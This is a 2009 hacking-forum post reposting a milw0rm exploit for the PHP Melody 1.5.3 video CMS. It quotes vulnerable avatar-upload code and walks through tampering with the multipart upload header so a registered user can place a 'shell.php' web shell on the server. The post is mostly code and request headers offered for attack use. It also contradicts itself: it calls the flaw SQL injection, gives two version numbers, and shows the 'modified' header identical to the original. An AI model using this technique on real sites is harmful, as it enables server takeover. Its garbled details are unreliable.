Multi Ethnic Hacking Group


    PHP Melody 1.5.3 Remote File Upload Injection Vulnerability

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    PHP Melody 1.5.3 Remote File Upload Injection Vulnerability

    Post by Foxi on Sat Jul 25, 2009 11:42 am

    Code:
    ---------------------------------------------------
    PHP Melody 1.5.3 remote injection upload file
    ---------------------------------------------------
     ###################################################
     [+] Author        :  Chip D3 Bi0s
     [+] Email        :  chipdebios[alt+64]gmail.com
     [+] Group        :  LatinHackTeam
     [+] Vulnerability :  SQL injection
     ###################################################

    ---------info Cms----------------
    name    : PHP Melody version 1.5.2
    email    : support@phpsugar.com
    dowloand : http://www.phpsugar.com
    web      : http://www.phpsugar.com
    price    : $39 USD
    ---------------------------------


    File: Upload_avatar.php

    37. if(preg_match("/.jpg/i", "$filein"))
    38.  {
    39.      $format = 'image/jpeg';
    40.  }
    41.  if (preg_match("/.gif/i", "$filein"))
    42.  {
    43.      $format = 'image/gif';
    44.  }
    45.  if(preg_match("/.png/i", "$filein"))
    46.  {
    47.      $format = 'image/png';
    48.  }
    49.     switch($format)
    50.      {
    51.          case 'image/jpeg':
    52.          $image = imagecreatefromjpeg($filein);
    53.          break;
    54.          case 'image/gif';
    55.          $image = imagecreatefromgif($filein);
    56.          break;
    57.          case 'image/png':
    58.          $image = imagecreatefrompng($filein);
    59.          break;
    60.      }
    ------------
    136.  $url = $_FILES['imagefile']['name'];  // Set $url To Equal The Filename For Later Use
    137.  if ($_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif" || $_FILES['imagefile']['type'] == "image/jpg" || $_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg") {
    138.    $file_ext = strrchr($_FILES['imagefile']['name'], '.');  // Get The File Extention In The Format Of , For Instance, .jpg, .gif or .php

    --------------------------------   
    explanation:
       
    according to the code it does is see if the http, it is
    'image/jpeg';'image/gif';'image/png';   
    If not upload

    how to exploit:
    you must first register
    then upload the avatar you ever so upload_avatar.php
    there will have to change the header


    header with a proper imagen.gif looks like

    -----------------------------191691572411478\r\n
    Content-Disposition: form-data; name="imagefile"; filename="imagen.gif"\r\n
    Content-Type: image/gif\r\n\r\n

    the header when you upload a shell.php looks like

    -----------------------------191691572411478\r\n
    Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
    Content-Type: application/octet-stream\r\n\r\n

       
    then just change it and let q and so can upload *. php

    -----------------------------191691572411478\r\n
    Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
    Content-Type: application/octet-stream\r\n\r\n



    Special greetings to my brother d4ng3r  ;)
    +++++++++++++++++++++++++++++++++
    [!] Produced in South America
    ---------------------------------

    # milw0rm.com [2009-07-23]


      Current date/time is Sat May 27, 2017 9:26 pm